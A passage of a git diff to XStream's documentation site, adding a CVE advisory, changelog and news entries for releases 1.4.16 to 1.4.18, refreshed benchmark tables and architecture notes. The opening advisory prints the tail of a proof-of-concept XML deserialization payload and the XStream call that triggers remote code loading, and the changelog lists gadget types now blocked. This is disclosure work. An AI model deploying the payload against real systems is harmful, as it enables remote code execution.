+ <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
+ <resourceCache/>
+ </default>
+ </javax.swing.UIDefaults>
+ </javax.swing.UIDefaults>
+ </tables>
+ </default>
+ </javax.swing.MultiUIDefaults>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>test</m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+</sorted-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled or when
+ another element is added to the set.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>ka1n4t found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/architecture.html b/xstream-distribution/src/content/architecture.html
index bdf8b6884bc61ed6c76ce5bd5d25042e65151c9b..473ffa0c79c9d907f544fa798ea6d2f51be2fa5d 100644
--- a/xstream-distribution/src/content/architecture.html
+++ b/xstream-distribution/src/content/architecture.html
@@ -1,7 +1,7 @@
<html>
<!--
Copyright (C) 2005, 2006 Joe Walnes.
- Copyright (C) 2006, 2007 XStream committers.
+ Copyright (C) 2006, 2007, 2021 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -15,18 +15,33 @@
</head>
<body>
- <p>The architecture of XStream consists of the four main components:</p>
+ <p>The architecture of XStream consists of the six main components:</p>
<ul>
<li><b>Converters</b></li>
- <!-- TODO: Mappers -->
+ <li><b>Mappers</b></li>
<li><b>Drivers (Writer and Reader)</b></li>
<li><b>Context</b></li>
+ <li><b>Type Permissions</b></li>
<li><b>Facade</b></li>
</ul>
<!-- ************ -->
+ <h1 id="LifeCycle">Life Cycle</h1>
+
+ <p>An XStream instance envisages two phases in its life cycle: Setup and Execution. A lot of default configuration is
+ already applied when an XStream instance is instantiated, i.e. the instance is directly in setup phase. Now is
+ the time to apply further configuration. This phase is not thread-safe.</p>
+
+ <p>Once an instance is properly configured in can be used in an execution phase, where
+ <a href="graphs.html">Java object graphs</a> are marshalled and unmarshalled. The execution phase is
+ thread-safe, i.e. is is possible to use an XStream instance concurrently for execution. However, XStream
+ builds caches during execution based on the configuration. Therefore, an instance should never be reconfigured
+ during or after execution phase. The result of any further (un-)marshalling might not be what is expected.</p>
+
+ <!-- ************ -->
+
<h1 id="Converters">Converters</h1>
<p>Whenever XStream encounters an object that needs to be converted to/from XML, it delegates to a suitable
@@ -36,13 +51,28 @@
<p>XStream comes <a href="converters.html">bundled with many converters</a> for common types, including primitives,
String, Collections, arrays, null, Date, etc.</p>
- <p>XStream also has a <i>default Converter</i>, that is used when no other Converters match a type. This uses
+ <p>XStream also has a <i>default Converter</i>, that is used when no other Converters match a type. This uses
reflection to automatically generate the XML for all the fields in an object.</p>
<p>If an object is composed of other objects, the Converter may delegate to other Converters.</p>
<p class="highlight">To customize the XML for particular object type a new Converter should be implemented.</p>
+ <!-- ************ -->
+
+ <h1 id="Mappers">Mappers</h1>
+
+ <p><a href="javadoc/com/thoughtworks/xstream/mapper/Mapper.html">Mapper</a> implementations are the key
+ components to map between names used in XML and names of Java elements and vice versa. Mappers are organized
+ in a chain, e.g. every time a mapper cannot map a special name it delegates the call to its logical parent.
+ Mappers keep the configuration in XStream and a converter should always use the Mapper (chain) of XStream to
+ map names it has to deal with.</p>
+
+ <p>XStream comes bundled with many mappers to map names of ordinary Java types and elements, of arrays, enums,
+ proxies, outer classes, to handle alias definitions, implicit collections, and ignored elements and even the
+ <a href="security.html#framework">Security Framework</a> is based on a Mapper implementation.</p>
+
+ <p class="highlight">Overwrite XStream's <em>wrapMapper</em> function to add custom mapper implementation.</p>
<!-- ************ -->
@@ -119,6 +149,14 @@
a hash table passed around whilst processing the object graph that can be used as the user sees fit (in a similar
way that the HttpServletRequest attributes are used in a web-application).</p>
+ <!-- ************ -->
+
+ <h1 id="TypePermissions">Type Permissions</h1>
+
+ <p>XStream's <a href="security.html#framework">Security Framework</a> consists of a Mapper implementation and
+ a lot of <a href="javadoc/com/thoughtworks/xstream/security/TypePermission.html">type permissions</a>. These
+ implementations are used to deny or allow the deserialization of java types based on their name or type
+ hierarchy.</p>
<!-- ************ -->
@@ -131,6 +169,5 @@
<p class="highlight">Remember, the XStream class is just a facade - it can always be bypassed for more advanced
operations.</p>
-
</body>
</html>
\ No newline at end of file
diff --git a/xstream-distribution/src/content/benchmarks.html b/xstream-distribution/src/content/benchmarks.html
index 8716ed16e4219243d243b2b8eb33fb150e539faa..53c8a2a46e4e96dae18b554be1fa8c4a5ed0948e 100644
--- a/xstream-distribution/src/content/benchmarks.html
+++ b/xstream-distribution/src/content/benchmarks.html
@@ -1,6 +1,6 @@
<html>
<!--
- Copyright (C) 2015, 2016, 2017, 2018, 2020 XStream committers.
+ Copyright (C) 2015, 2016, 2017, 2018, 2020, 2021 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -52,75 +52,81 @@
</tr>
<tr>
<th>W3C DOM (Open JDK 11.0.8)</th>
- <td>10587727.502</td>
- <td>58925980.509</td>
- <td>5547526.718</td>
+ <td>10568442.558</td>
+ <td>59894584.643</td>
+ <td>5382390.375</td>
</tr>
<tr>
<th>JDOM (1.1.3)</th>
- <td>6541414.372</td>
- <td>6842504.530</td>
- <td>19329741.881</td>
+ <td>6379300.940</td>
+ <td>6887733.303</td>
+ <td>13598531.633</td>
</tr>
<tr>
<th>JDOM 2 (2.0.5)</th>
- <td>5870155.438</td>
- <td>9833407.570</td>
- <td>18291190.166</td>
+ <td>5929805.928</td>
+ <td>9876176.832</td>
+ <td>12503949.903</td>
</tr>
<tr>
<th>DOM4J (1.6.1)</th>
- <td>8680900.188</td>
- <td>79133279.111</td>
- <td>5501080.957</td>
+ <td>8543670.534</td>
+ <td>79125701.566</td>
+ <td>5372787.809</td>
</tr>
<tr>
<th>XOM (1.1)</th>
- <td>8062184.585</td>
- <td>33057256.100</td>
- <td>5842749.643</td>
+ <td>7968868.873</td>
+ <td>34141742.595</td>
+ <td>5425911.128</td>
</tr>
<tr>
<th>StAX (BEA 1.2.0)</th>
- <td>3208123.897</td>
- <td>862349.819</td>
- <td>798003.236</td>
+ <td>3182516.188</td>
+ <td>667706.032</td>
+ <td>603986.803</td>
</tr>
<tr>
<th>StAX (Woodstox 3.2.7)</th>
- <td>1958090.473</td>
- <td>764703.865</td>
- <td>852446.766</td>
+ <td>1959085.951</td>
+ <td>630843.461</td>
+ <td>835465.393</td>
</tr>
<tr>
<th>StAX (Open JDK 11.0.8)</th>
- <td>8449107.541</td>
- <td>771151.977</td>
- <td>630602.435</td>
+ <td>8450930.541</td>
+ <td>885917.070</td>
+ <td>868883.676</td>
+ </tr>
+ <tr>
+ <th>XPP (MXParser 1.2.1)</th>
+ <td>2131602.489</td>
+ <td>814691.675</td>
+ <td>13287597.794</td>
</tr>
<tr>
<th>XPP (Xpp3 min 1.1.4c)</th>
- <td>2076542.383</td>
- <td>717142.178</td>
- <td>12332209.281</td>
+ <td>2084284.951</td>
+ <td>754593.348</td>
+ <td>13056389.184</td>
</tr>
<tr>
<th>XPP (kXML2 min 2.3.0)</th>
- <td>3609529.640</td>
- <td>886358.766</td>
- <td>37562872.191</td>
+ <td>3561706.234</td>
+ <td>855787.083</td>
+ <td>36819091.742</td>
</tr>
<tr>
- <th>Binary (XStream 1.4.13)</th>
- <td>1057890.361</td>
- <td>385824.031</td>
- <td>255649.550</td>
+ <th>Binary (XStream 1.4.16)</th>
+ <td>1065228.134</td>
+ <td>405493.660</td>
+ <td>284620.649</td>
</tr>
<tr>
<th>Jettison (1.2)</th>
- <td>3610357.375</td>
- <td>594530.928</td>
- <td>674957.675</td>
+ <td>3682704.689</td>
+ <td>601803.834</td>
+ <td>678187.271</td>
</tr>
</table>
@@ -146,15 +152,15 @@
</tr>
<tr>
<th>Custom</th>
- <td>9511483.088</td>
+ <td>9324531.713</td>
</tr>
<tr>
<th>Java Bean</th>
- <td>18956037.656</td>
+ <td>19658157.449</td>
</tr>
<tr>
<th>Reflection</th>
- <td>22467750.653</td>
+ <td>20859870.075</td>
</tr>
</table>
@@ -180,27 +186,27 @@
</tr>
<tr>
<th>No Cache</th>
- <td>9381243.000</td>
+ <td>9796296.611</td>
</tr>
<tr>
<th>Intern</th>
- <td>12528650.663</td>
+ <td>14262839.973</td>
</tr>
<tr>
<th>ConcurrentMap (length limit)</th>
- <td>10583918.884</td>
+ <td>10538757.220</td>
</tr>
<tr>
<th>ConcurrentMap (unlimited)</th>
- <td>11762308.937</td>
+ <td>11252298.498</td>
</tr>
<tr>
<th>Sync'd WeakCache (length limit)</th>
- <td>11104926.490</td>
+ <td>11298773.753</td>
</tr>
<tr>
<th>Sync'd WeakCache (unlimited)</th>
- <td>11092087.483</td>
+ <td>11279714.685</td>
</tr>
</table>
@@ -241,23 +247,23 @@
</tr>
<tr>
<th>No Coding</th>
- <td>4068459.179</td>
+ <td>3917564.563</td>
</tr>
<tr>
<th>Dollar Coding</th>
- <td>5006636.275</td>
+ <td>4570684.356</td>
</tr>
<tr>
<th>Escaped Underscore Coding</th>
- <td>6714770.410</td>
+ <td>6322642.927</td>
</tr>
<tr>
<th>Cached Escaped Underscore Coding</th>
- <td>4486384.078</td>
+ <td>4339193.305</td>
</tr>
<tr>
- <th>Xml Friendly Coding</th>
- <td>5017414.939</td>
+ <th>XML Friendly Coding</th>
+ <td>5102368.550</td>
</tr>
</table>
@@ -279,7 +285,7 @@
Coding still apply.</dd>
<dt>Cached Escaped Underscore Coding</dt>
<dd>An implementation that implements a cache for the NameCoder that escapes the underscores.</dd>
- <dt>Xml Friendly Coding</dt>
+ <dt>XML Friendly Coding</dt>
<dd>The default implementation of XStream using a StringBuilder and a cache, encoding any character that is
invalid for XML names. It implements also the underscore escaping for compatibility reasons with XML created by
earlier versions of XStream.</dd>
diff --git a/xstream-distribution/src/content/changes.html b/xstream-distribution/src/content/changes.html
index e45161b4e4baac37d736115083058c07c0e304db..33bac45afdc49ca8a260a5a3090cf7b9bb39139a 100644
--- a/xstream-distribution/src/content/changes.html
+++ b/xstream-distribution/src/content/changes.html
@@ -1,7 +1,7 @@
<html>
<!--
Copyright (C) 2005, 2006 Joe Walnes.
- Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020 XStream committers.
+ Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020, 2021 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -28,19 +28,158 @@
filter for the appropriate milestone.
</p>
-<!--
+<!--
<h1 id="upcoming-1.4.x">Upcoming 1.4.x maintenance release</h1>
<p>Not yet released.</p>
-->
+ <h1 id="1.4.18">1.4.18</h1>
+
+ <p>Released August 22, 2021.</p>
+
+ <p class="highlight">This maintenance release addresses following security vulnerabilities, when unmarshalling with
+ an XStream instance using the default blacklist of an uninitialized security framework. XStream is therefore now
+ using a whitelist by default.</p>
+
+ <ul>
+ <li><a href="CVE-2021-39139.html">CVE-2021-39139</a></li>
+ <li><a href="CVE-2021-39140.html">CVE-2021-39140</a></li>
+ <li><a href="CVE-2021-39141.html">CVE-2021-39141</a></li>
+ <li><a href="CVE-2021-39144.html">CVE-2021-39144</a></li>
+ <li><a href="CVE-2021-39145.html">CVE-2021-39145</a></li>
+ <li><a href="CVE-2021-39146.html">CVE-2021-39146</a></li>
+ <li><a href="CVE-2021-39147.html">CVE-2021-39147</a></li>
+ <li><a href="CVE-2021-39148.html">CVE-2021-39148</a></li>
+ <li><a href="CVE-2021-39149.html">CVE-2021-39149</a></li>
+ <li><a href="CVE-2021-39150.html">CVE-2021-39150</a></li>
+ <li><a href="CVE-2021-39151.html">CVE-2021-39151</a></li>
+ <li><a href="CVE-2021-39152.html">CVE-2021-39152</a></li>
+ <li><a href="CVE-2021-39153.html">CVE-2021-39153</a></li>
+ <li><a href="CVE-2021-39154.html">CVE-2021-39154</a></li>
+ </ul>
+
+ <h2>Minor changes</h2>
+
+ <ul>
+ <li>GHI:#233: Support serializable types with non-serializable parent with PureJavaReflectionConverter.</li>
+ </ul>
+
+ <h2>Stream compatibility</h2>
+
+ <p class="highlight">Starting with version 1.14.12 nine years ago, XStream contains a
+ <a href="security.html#framework">Security Framework</a> to implement a black- or whitelist for the allowed types
+ at deserialization time. Until version 1.4.17, XStream kept a default blacklist in order to deny all types of the
+ Java runtime, which are used for all kinds of <a href="security.html#CVEs">security attacks</a>, in order to
+ guarantee optimal runtime compatibility for existing users. However, this approach has failed. The last months
+ have shown, that the Java runtime alone contains dozens of types that can be used for an attack, not even looking
+ at the 3rd party libraries on a classpath. The new version of XStream uses therefore now by default a whitelist,
+ which is recommended since nine years. It also has been complaining on the console for a long time about an
+ uninitialized security framework the first time it was run. Anyone who has followed the advice and initialized the
+ security framework for their own scenario can easily update to the new version without any problem. Everyone else
+ will have to do a proper initialization now, otherwise the new version will fail with certainty at deserialization
+ time.</p>
+
+ <h1 id="1.4.17">1.4.17</h1>
+
+ <p>Released May 13, 2021.</p>
+
+ <p class="highlight">This maintenance release addresses the security vulnerability
+ <a href="CVE-2021-29505.html">CVE-2021-29505</a>, when unmarshalling with XStream instance using an uninitialized
+ security framework.</p>
+
+ <h2>Stream compatibility</h2>
+
+ <ul>
+ <li>The following types are now blacklisted by default and the deserialization
+ of XML containing one of the two types will fail. You will have to enable these types by explicit
+ configuration, if you need them:<br>
+ <ul>
+ <li>any type in the java.rmi.* and sun.rmi.* package hierarchies</li>
+ <li>the individual type com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl</li>
+ </ul>
+ </li>
+ </ul>
+
+ <h1 id="1.4.16">1.4.16</h1>
+
+ <p>Released March 13, 2021.</p>
+
+ <p class="highlight">This maintenance release switches XStream's default parser and addresses following security
+ vulnerabilities, when unmarshalling with an XStream instance using an uninitialized security framework.</p>
+
+ <ul>
+ <li><a href="CVE-2021-21341.html">CVE-2021-21341</a></li>
+ <li><a href="CVE-2021-21342.html">CVE-2021-21342</a></li>
+ <li><a href="CVE-2021-21343.html">CVE-2021-21343</a></li>
+ <li><a href="CVE-2021-21344.html">CVE-2021-21344</a></li>
+ <li><a href="CVE-2021-21345.html">CVE-2021-21345</a></li>
+ <li><a href="CVE-2021-21346.html">CVE-2021-21346</a></li>
+ <li><a href="CVE-2021-21347.html">CVE-2021-21347</a></li>
+ <li><a href="CVE-2021-21348.html">CVE-2021-21348</a></li>
+ <li><a href="CVE-2021-21349.html">CVE-2021-21349</a></li>
+ <li><a href="CVE-2021-21350.html">CVE-2021-21350</a></li>
+ <li><a href="CVE-2021-21351.html">CVE-2021-21351</a></li>
+ </ul>
+
+ <h2>Major changes</h2>
+
+ <ul>
+ <li>Switch from Xpp3 as default parser to MXParser, a fork of Xpp3.</li>
+ </ul>
+
+ <h2>Minor changes</h2>
+
+ <ul>
+ <li>GHI:#238: Fix possibility to process references on enum types at deserialization.</li>
+ <li>GHI:#237: Fix optimization in XmlFriendlyNameCoder.</li>
+ </ul>
+
+ <h2>Stream compatibility</h2>
+
+ <ul>
+ <li>The following types are now blacklisted by default and the deserialization
+ of XML containing one of the two types will fail. You will have to enable these types by explicit
+ configuration, if you need them:<br>
+ <ul>
+ <li>the type hierarchies for java.io.InputStream, java.nio.channels.Channel,
+ javax.activation.DataSource and javax.sql.rowsel.BaseRowSet</li>
+ <li>the individual types com.sun.corba.se.impl.activation.ServerTableEntry,
+ com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator,
+ sun.awt.datatransfer.DataTransferer$IndexOrderComparator, and sun.swing.SwingLazyValue</li>
+ <li>the individual types com.sun.corba.se.impl.activation.ServerTableEntry,
+ com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator,
+ sun.awt.datatransfer.DataTransferer$IndexOrderComparator, and sun.swing.SwingLazyValue</li>
+ <li>the internal type Accessor$GetterSetterReflection of JAXB, the internal types
+ MethodGetter$PrivilegedGetter and ServiceFinder$ServiceNameIterator of JAX-WS</li>
+ <li>all inner classes of javafx.collections.ObservableList</li>
+ <li>an internal ClassLoader used in a private copy of BCEL within the Java runtime</li>
+ </ul>
+ </li>
+ </ul>
+
+ <h2>Dependencies</h2>
+
+ <p>The default parser of XStream has changed from the Xpp3Parser in artifact xpp3:xpp3_min to MXParser, a fork of
+ Xpp3 in the artifact io.github.x-stream:mxparser. The Xpp3 is unmaintained for a long time, bugs have been fixed
+ reported more than a decade ago, improvements by other forks have been incorporated and some endless loops have
+ been fixed, that could have been utilized as DoS attack.</p>
+
+ <p>XStream has therefore new default dependencies. If you have used XStream with the default driver (i.e. Xpp3),
+ you can still exchange the XStream library for a drop-in replacement, but you will also have to remove the Xpp3 and
+ add the MXParser library instead.</p>
+
+ <p>For build time you will have to add the Xpp3 library to your dependencies, if you made explicitly use of the
+ Xpp3 driver. If you did explicitly use a different driver than Xpp3 and had therefore excluded the Xpp3
+ dependency, you might have to exclude now the new MXParser dependency instead to minimize your dependency list.</p>
+
<h1 id="1.4.15">1.4.15</h1>
<p>Released December 13, 2020.</p>
<p class="highlight">This maintenance release addresses the security vulnerabilities
<a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
- unmarshalling for XStream instances with uninitialized security framework.</p>
+ unmarshalling with XStream instance using an uninitialized security framework.</p>
<h2>Minor changes</h2>
@@ -79,7 +218,8 @@
<p class="highlight">This maintenance release addresses the security vulnerability
<a href="CVE-2020-26217.html">CVE-2020-26217</a>, reported originally as CVE-2017-9805 for Struts' XStream Plugin,
- an arbitrary execution of commands when unmarshalling for XStream instances with uninitialized security framework.</p>
+ an arbitrary execution of commands when unmarshalling with XStream instances using an uninitialized security
+ framework.</p>
<h2>Stream compatibility</h2>
@@ -130,7 +270,7 @@
<p>Released October 23, 2018.</p>
<p class="highlight">This maintenance release addresses again the security vulnerability <a href="CVE-2013-7285.html">
- CVE-2013-7285</a>, an arbitrary execution of commands when unmarshalling for XStream instances with
+ CVE-2013-7285</a>, an arbitrary execution of commands when unmarshalling with XStream instances using an
uninitialized security framework. Only 1.4.10 uninitialized security framework was affected.</p>
<h2>Minor changes</h2>
diff --git a/xstream-distribution/src/content/download.html b/xstream-distribution/src/content/download.html
index 577184384171f06edc11a7b05fea53093b7a9788..949f57d2097447cf9a5e05a366dcfb32c6a3b05f 100644
--- a/xstream-distribution/src/content/download.html
+++ b/xstream-distribution/src/content/download.html
@@ -1,7 +1,7 @@
<html>
<!--
Copyright (C) 2005, 2006 Joe Walnes.
- Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2015, 2016, 2017, 2018, 2020 XStream committers.
+ Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2015, 2016, 2017, 2018, 2020, 2021 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -18,18 +18,18 @@
<p><a href="versioning.html">About XStream version numbers...</a></p>
- <h1 id="stable">Stable Version: <span class="version">1.4.15</span></h1>
+ <h1 id="stable">Stable Version: <span class="version">1.4.18</span></h1>
<ul>
- <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-bin.zip">Binary distribution:</a></b>
+ <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.18/xstream-distribution-1.4.18-bin.zip">Binary distribution:</a></b>
Contains the XStream jar files, the Hibernate and Benchmark modules and all the dependencies.</li>
- <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-src.zip">Source distribution:</a></b>
+ <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.18/xstream-distribution-1.4.18-src.zip">Source distribution:</a></b>
Contains the complete XStream project as if checked out from the Subversion version tag.</li>
- <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.15/xstream-1.4.15.jar">XStream Core only:</a>
+ <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.18/xstream-1.4.18.jar">XStream Core only:</a>
The xstream.jar only as it is downloaded automatically when it is referenced as Maven dependency.</b></li>
- <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.15/xstream-hibernate-1.4.15.jar">XStream Hibernate module:</a></b>
+ <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.18/xstream-hibernate-1.4.18.jar">XStream Hibernate module:</a></b>
The xstream-hibernate.jar as it is downloaded automatically when it is referenced as Maven dependency.</li>
- <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.15/xstream-jmh-1.4.15-app.zip">XStream JMH module:</a></b>
+ <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.18/xstream-jmh-1.4.18-app.zip">XStream JMH module:</a></b>
The xstream-jmh-app.zip as standalone application with start scripts and all required libraries.</li>
</ul>
@@ -41,7 +41,7 @@
<div class="Source XML"><pre><dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
</dependency></pre></div>
<h1 id="previous-releases">Previous Releases</h1>
@@ -55,17 +55,21 @@
<h1 id="optional-deps">Optional Dependencies</h1>
- <p>Note, that all those dependencies can be optional. XStream uses by default the XPP API in combination with the
- Xpp3 implementation. Therefore are these dependencies not declared as optional in Maven. However, depending on your
- choice of the XML parser, you can exclude the dependencies for the XPP API (e.g. by selecting Xpp3 directly) or
- Xpp3 (e.g. by selecting StAX). You will then have to declare the dependencies for the alternative XML parser
- yourself unless you use a parser form the Java runtime.</p>
+ <p>All these dependencies can be optional. XStream uses by default the XPP API in combination with the MXParser
+ implementation. Therefore are these dependencies not declared as optional in Maven. However, depending on your
+ choice of the XML parser, you can exclude the dependencies for the MXParser (e.g. by selecting StAX). You will
+ then have to declare the dependencies for the alternative XML parser yourself unless you use a parser form the Java
+ runtime.</p>
+
+ <p>Note, that the bundle entries of the manifest do not declare any dependencies. In an OSGi environment it is the
+ task of the developer to setup the used bundles for his own project.</p>
<ul>
<li>Supported XML parsers and packages:
<ul>
+ <li><a href="https://repo1.maven.org/maven2/io/github/x-stream/mxparser/1.2.2/mxparser-1.2.2.jar">MXParser</a>, an XML pull parser and fork of Xpp3 (recommended).</li>
<li><a href="https://repo1.maven.org/maven2/xmlpull/xmlpull/1.1.3.1/xmlpull-1.1.3.1.jar">XmlPull</a>, the <a href="http://www.xmlpull.org/">XML pull parser API</a> and factory to detect available implementations.</li>
- <li><a href="http://www.extreme.indiana.edu/dist/java-repository/xpp3/jars/xpp3_min-1.1.4c.jar">Xpp3</a>, an XML pull parser (recommended).</li>
+ <li><a href="http://www.extreme.indiana.edu/dist/java-repository/xpp3/jars/xpp3_min-1.1.4c.jar">Xpp3</a>, an XML pull parser.</li>
<li><a href="http://downloads.sourceforge.net/kxml/kxml2-2.3.0.jar">kXML2</a> or <a href="http://downloads.sourceforge.net/kxml/kxml2-min-2.3.0.jar">kXML2-min</a>, an XML pull parser.</li>
<li><a href="http://downloads.sourceforge.net/dom4j/dom4j-1.6.1.zip">DOM4J</a>, easy XML representation and manipulation framework.</li>
<li><a href="http://www.jdom.org/dist/binary/archive/jdom-1.1.3.zip">JDOM</a>, easy XML representation and manipulation (superseded by JDOM2).</li>
@@ -109,8 +113,8 @@
<ul>
<li>JMH dependencies:
<ul>
- <li><a href="https://repo1.maven.org/maven2/org/openjdk/jmh/jmh-core/1.19/jmh-core-1.19.jar">JMH Core 1.19</a>, for Java 6 or higher.</li>
- <li><a href="https://repo1.maven.org/maven2/org/openjdk/jmh/jmh-generator-annprocess/1.19/jmh-generator-annprocess-1.19.jar">JMH Generator Annotation Processor 1.19</a>, for Java 6 or higher.</li>
+ <li><a href="https://repo1.maven.org/maven2/org/openjdk/jmh/jmh-core/1.21/jmh-core-1.21.jar">JMH Core 1.21</a>, for Java 6 or higher.</li>
+ <li><a href="https://repo1.maven.org/maven2/org/openjdk/jmh/jmh-generator-annprocess/1.21/jmh-generator-annprocess-1.21.jar">JMH Generator Annotation Processor 1.21</a>, for Java 6 or higher.</li>
</ul>
</li>
</ul>
diff --git a/xstream-distribution/src/content/index.html b/xstream-distribution/src/content/index.html
index 38a0d1f5add1941986b1e7cc125830661229bcce..7ae8d130b5170c5ac9c4b550fdefba457fb18588 100644
--- a/xstream-distribution/src/content/index.html
+++ b/xstream-distribution/src/content/index.html
@@ -1,7 +1,7 @@
<html>
<!--
Copyright (C) 2005, 2006 Joe Walnes.
- Copyright (C) 2006, 2007, 2008, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2020 XStream committers.
+ Copyright (C) 2006, 2007, 2008, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2020, 2021 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -73,11 +73,24 @@
<h1 id="news">Latest News</h1>
- <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2>
+ <h2 id="release"><b>August 22, 2021</b> XStream 1.4.18 released</h2>
<p class="highlight">This maintenance release addresses the security vulnerabilities
- <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
- unmarshalling for XStream instances with uninitialized security framework.</p>
+ <a href="CVE-2021-39139.html">CVE-2021-39139</a>,
+ <a href="CVE-2021-39140.html">CVE-2021-39140</a>,
+ <a href="CVE-2021-39141.html">CVE-2021-39141</a>,
+ <a href="CVE-2021-39144.html">CVE-2021-39144</a>,
+ <a href="CVE-2021-39145.html">CVE-2021-39145</a>,
+ <a href="CVE-2021-39146.html">CVE-2021-39146</a>,
+ <a href="CVE-2021-39147.html">CVE-2021-39147</a>,
+ <a href="CVE-2021-39148.html">CVE-2021-39148</a>,
+ <a href="CVE-2021-39149.html">CVE-2021-39149</a>,
+ <a href="CVE-2021-39150.html">CVE-2021-39150</a>,
+ <a href="CVE-2021-39151.html">CVE-2021-39151</a>,
+ <a href="CVE-2021-39152.html">CVE-2021-39152</a>,
+ <a href="CVE-2021-39153.html">CVE-2021-39153</a>, and
+ <a href="CVE-2021-39154.html">CVE-2021-39154</a>, when unmarshalling with an XStream instance using the default
+ blacklist of an uninitialized security framework. XStream is therefore now using a whitelist by default.</p>
<p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
diff --git a/xstream-distribution/src/content/news.html b/xstream-distribution/src/content/news.html
index 1e7962607eb0e864e17d9642747b4935a24ee10b..d9c8007d8448df78bfb251152fae6e39e8e740d8 100644
--- a/xstream-distribution/src/content/news.html
+++ b/xstream-distribution/src/content/news.html
@@ -1,7 +1,7 @@
<html>
<!--
Copyright (C) 2005, 2006 Joe Walnes.
- Copyright (C) 2006, 2007, 2008, 2009, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2020 XStream committers.
+ Copyright (C) 2006, 2007, 2008, 2009, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2020, 2021 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -16,6 +16,60 @@
<body>
+ <h2 id="1.4.18"><b>August 22, 2021</b> XStream 1.4.18 released</h2>
+
+ <p class="highlight">This maintenance release addresses the security vulnerabilities
+ <a href="CVE-2021-39139.html">CVE-2021-39139</a>,
+ <a href="CVE-2021-39140.html">CVE-2021-39140</a>,
+ <a href="CVE-2021-39141.html">CVE-2021-39141</a>,
+ <a href="CVE-2021-39144.html">CVE-2021-39144</a>,
+ <a href="CVE-2021-39145.html">CVE-2021-39145</a>,
+ <a href="CVE-2021-39146.html">CVE-2021-39146</a>,
+ <a href="CVE-2021-39147.html">CVE-2021-39147</a>,
+ <a href="CVE-2021-39148.html">CVE-2021-39148</a>,
+ <a href="CVE-2021-39149.html">CVE-2021-39149</a>,
+ <a href="CVE-2021-39150.html">CVE-2021-39150</a>,
+ <a href="CVE-2021-39151.html">CVE-2021-39151</a>,
+ <a href="CVE-2021-39152.html">CVE-2021-39152</a>,
+ <a href="CVE-2021-39153.html">CVE-2021-39153</a>, and
+ <a href="CVE-2021-39154.html">CVE-2021-39154</a>, when unmarshalling with an XStream instance using the default
+ blacklist of an uninitialized security framework. XStream is therefore now using a whitelist by default.</p>
+
+ <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
+
+ <p>Note, the next major release 1.5 will require Java 8.</p>
+
+ <h2 id="1.4.17"><b>May 13, 2021</b> XStream 1.4.17 released</h2>
+
+ <p class="highlight">This maintenance release addresses the security vulnerability
+ <a href="CVE-2021-29505.html">CVE-2021-29505</a>, when unmarshalling with XStream instances using an uninitialized
+ security framework.</p>
+
+ <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
+
+ <p>Note, the next major release 1.5 will require Java 8.</p>
+
